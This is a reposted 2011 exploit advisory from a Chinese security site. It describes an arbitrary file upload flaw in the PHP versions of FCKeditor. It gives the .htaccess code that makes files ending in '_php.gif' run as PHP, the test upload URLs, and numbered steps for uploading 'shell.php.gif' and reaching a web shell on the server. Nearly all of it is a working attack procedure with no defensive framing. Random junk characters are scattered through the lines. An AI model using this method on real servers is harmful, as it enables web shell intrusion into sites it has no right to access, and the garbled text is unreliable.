FCKeditor所有php版本Upload上传漏洞4 S9 V u5 A/ \1 [. C4 b
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
' m8 E- k) `& v: @1 r减小字体 增大字体
9 Y1 i! y; h0 n u$ Z[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability2 z$ H- D4 A* R; i4 [7 k
[+] Date: 2011
E- l: \' L, X9 U7 w[+] Author : sinesafe.cn
9 @- [% u; B# l$ [; ~3 N! d[+] Website : WwW.sinesafe.cn
~, l% g; e* T1 z2 C7 o1 m———————————————————" Z+ O& e3 D+ c7 V( O
1.create a htaccess file:1 l: Z0 t( i% r+ H; _
code:
* U7 [/ c! K4 R& d1 w+ T& f7 Z5 e G<FilesMatch “_php.gif”>
9 g9 K" F+ o& ]/ T% ~6 e2 PSetHandler application/x-httpd-php
# Z% w# S+ o6 ^</FilesMatch>2 L9 r0 f3 |( ?
! p" @6 T8 G4 ]7 X
2.Now upload this htaccess with FCKeditor.- P: ?" W `, C
! u- r3 x2 ]( H' R+ A! D f
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html, g7 R* d2 E9 Z, z: n" E( G4 w
% j% X" m& D1 B% z" T+ Qhttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html
9 C# {% l0 S" t( X/ A0 B9 [; U. n4 @" E% L w( C& J
———————————————————————————————-
& G S! t6 `3 \. A3 ?0 t3.Now upload shell.php.gif with FCKeditor.+ n# N$ r0 P4 ]" W @
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.3 q: u: e3 S3 a6 R
5.http://www.sinesafe.cn/anything/shell_php.gif
; R/ [4 N! N( ~0 [- k3 K9 H$ }6.Now shell is available from server. |
/ U; J/ l4 x3 o. s$ e: L9 b$ K; t
+ V$ n b4 g# ?8 [" O" ]8 |
7 s) w+ ?7 y+ U; |6 s |